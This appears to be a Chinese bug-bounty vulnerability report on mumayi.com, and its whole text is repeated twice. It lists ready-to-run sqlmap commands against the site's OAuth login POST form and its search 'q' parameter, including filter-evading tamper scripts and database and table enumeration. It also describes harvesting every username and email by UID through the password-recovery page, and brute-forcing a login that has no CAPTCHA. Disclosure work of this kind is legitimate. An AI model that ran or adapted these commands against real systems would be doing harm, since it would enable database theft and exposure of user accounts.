之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs
还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs
还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank